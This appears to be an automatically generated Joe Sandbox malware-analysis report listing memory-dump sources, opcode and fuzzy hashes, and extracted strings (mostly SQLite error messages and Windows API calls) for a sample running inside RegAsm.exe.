                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: string or blob too big
                                                                                                                                                                                                                                                              • API String ID: 0-2803948771
                                                                                                                                                                                                                                                              • Opcode ID: 298776caa3e611aace399f4a05c46030fa3a01b07f76efc87b71654428fe24f8
                                                                                                                                                                                                                                                              • Instruction ID: 3313e6d744de4004afc552226d7f81cdeb907ff638d8ba4a4b94114477211555
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 298776caa3e611aace399f4a05c46030fa3a01b07f76efc87b71654428fe24f8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C481FFB5E043058BC304CF18C881B5AB7F5AFA8310F4D492CFA859F2A2E776E945C792
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: *$?
                                                                                                                                                                                                                                                              • API String ID: 0-2367018687
                                                                                                                                                                                                                                                              • Opcode ID: 48515e089074c1ec22c4f4c07be96bb0e1b3c1b0297154e5c6a43c404302e60f
                                                                                                                                                                                                                                                              • Instruction ID: e202784a8b4abaeb4ab9536126d1678dd5b1f789f4ef235ab88f7f22be864f11
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48515e089074c1ec22c4f4c07be96bb0e1b3c1b0297154e5c6a43c404302e60f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B71F9B06043999FD7138F28C98071FBBE9EF85200F6C496DE8C987341D775DA468792
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • LIKE or GLOB pattern too complex, xrefs: 1983C94F
                                                                                                                                                                                                                                                              • ESCAPE expression must be a single character, xrefs: 1983CA43
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                                                                                                                                                                                                              • API String ID: 0-264706735
                                                                                                                                                                                                                                                              • Opcode ID: cda8e214ec66bfd31576ea1447eb20526a67303e330252af7619c6523fb59f02
                                                                                                                                                                                                                                                              • Instruction ID: c99147318523ac4497a3690360fc25a5ff5abd070a39c5a213a70186706b18d8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cda8e214ec66bfd31576ea1447eb20526a67303e330252af7619c6523fb59f02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9961AAB5E142958FDB04CE26CC82F657791AB52327FAD824CEC915B2C2D736C681C3D1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: string or blob too big
                                                                                                                                                                                                                                                              • API String ID: 0-2803948771
                                                                                                                                                                                                                                                              • Opcode ID: 62c51035daca94181c67a7dc0d2dfaa0bee1cf534b8870e0caffd65d3f85618c
                                                                                                                                                                                                                                                              • Instruction ID: aaf285859888a03298a7bf8dbca2e7a7e32f296c38cdebeaa340dd64777e6020
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62c51035daca94181c67a7dc0d2dfaa0bee1cf534b8870e0caffd65d3f85618c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80415C738042454FE7108E28AC4179EBB969F61321F8C4A3DEDA9573D2E666E748C3D2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • winDelete, xrefs: 1983569C
                                                                                                                                                                                                                                                              • delayed %dms for lock/sharing conflict at line %d, xrefs: 198356D1
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
                                                                                                                                                                                                                                                              • API String ID: 0-1405699761
                                                                                                                                                                                                                                                              • Opcode ID: fe5a75f885a5306c412e14e4b93eb7e0e1edf9575c9cae4625a06af56f6da287
                                                                                                                                                                                                                                                              • Instruction ID: 9f1369ee22d6b4b8d74551ed60e09fff516f8d7a7b27efa8b01161bdad93885c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe5a75f885a5306c412e14e4b93eb7e0e1edf9575c9cae4625a06af56f6da287
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14314AB2A002618FEB102A3CDDC995A771CE750263F89463AED1FC61C1F621CA4DC6F2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: string or blob too big
                                                                                                                                                                                                                                                              • API String ID: 0-2803948771
                                                                                                                                                                                                                                                              • Opcode ID: c3120da2cd30a0282d6fca88af0fa2bb37c5c95fd5dbb5cbd24946fd58aaa6a4
                                                                                                                                                                                                                                                              • Instruction ID: 823138e218e93bce531bdae6574f24dcc6ec6d4a57788156bb46964505ac4228
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3120da2cd30a0282d6fca88af0fa2bb37c5c95fd5dbb5cbd24946fd58aaa6a4
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73319DB69042245BD7144E28DC00B66775A9B91336F9C42ACFC556F3C2E267EE16C3E0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,?,00000000), ref: 00405C48
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                                                                                                              • String ID: e^@
                                                                                                                                                                                                                                                              • API String ID: 1029625771-3820609939
                                                                                                                                                                                                                                                              • Opcode ID: ab3d73b2a095d0cd789bdf381eceaff92637ffdb2eee61bd1845d46ca7e4ea72
                                                                                                                                                                                                                                                              • Instruction ID: e00f8a410b6168d8007e4af54646daa8228851e18fdeb3befff5dbae74f8fd61
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab3d73b2a095d0cd789bdf381eceaff92637ffdb2eee61bd1845d46ca7e4ea72
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A311875601B05EBEB208F64D848BABB7E4EF44345F14887AE456EB390E738E9419F18
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • sqlite_stat1, xrefs: 1991DF30
                                                                                                                                                                                                                                                              • SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1991DF4F
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
                                                                                                                                                                                                                                                              • API String ID: 0-3572622772
                                                                                                                                                                                                                                                              • Opcode ID: ab70f9932438fe4e55f1be5d46efbec3fef5fb76e89442fd0151b95cb5c94db2
                                                                                                                                                                                                                                                              • Instruction ID: d6230504c495d3e809bb570dff96371c6a29043a58b7ddd3b858a7508198b5a2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab70f9932438fe4e55f1be5d46efbec3fef5fb76e89442fd0151b95cb5c94db2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4921F275A003495FDB01EE25CC80E2AB3A8BF81630B4D416CFC849B391E321FA14C791
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: OsError 0x%lx (%lu)
                                                                                                                                                                                                                                                              • API String ID: 0-3720535092
                                                                                                                                                                                                                                                              • Opcode ID: 071aa57313ce1da89cddf083be61862bd7e8824b7cc149361245ce724b7d5401
                                                                                                                                                                                                                                                              • Instruction ID: a9a05260a32d68db2fcf049460acce0642ec859ccd3ffd35c7ddc8a466c16444
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 071aa57313ce1da89cddf083be61862bd7e8824b7cc149361245ce724b7d5401
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D821DE71600260AFEB119BBCCC88F5F37ACFF00646F080528F94AD51A0DB35DA1AD7A2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,19A17496,?,?,?,?), ref: 19A16E67
                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,19A17496,?,?,?,?), ref: 19A16E8D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                              • String ID: YHI;
                                                                                                                                                                                                                                                              • API String ID: 442123175-2037931556
                                                                                                                                                                                                                                                              • Opcode ID: b605b5bf560db0f20bdef41ccfd8261a82bceece20b914f0206e030bf7e0abf7
                                                                                                                                                                                                                                                              • Instruction ID: dc27c48c5bae5466454740aee174398ea161516849d85b8f7952bd8f9ed662e1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b605b5bf560db0f20bdef41ccfd8261a82bceece20b914f0206e030bf7e0abf7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80219635A002699FCB19CF29C8809D9B7BAEF48705F1441AAE909DB251D730ED4ACB60
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • GetXStateFeaturesMask, xrefs: 19A00E34
                                                                                                                                                                                                                                                              • InitializeCriticalSectionEx, xrefs: 19A00E84
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
                                                                                                                                                                                                                                                              • API String ID: 0-4196971266
                                                                                                                                                                                                                                                              • Opcode ID: 2b431b06a1e50ed0e2d4433f7b656427bcb0cb2c88c8a0dda5acefc1256d835d
                                                                                                                                                                                                                                                              • Instruction ID: 51d5c307528f578e8f15d0f89e96deaf88d062d2d3b9a6ef14169378e165fe3c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b431b06a1e50ed0e2d4433f7b656427bcb0cb2c88c8a0dda5acefc1256d835d
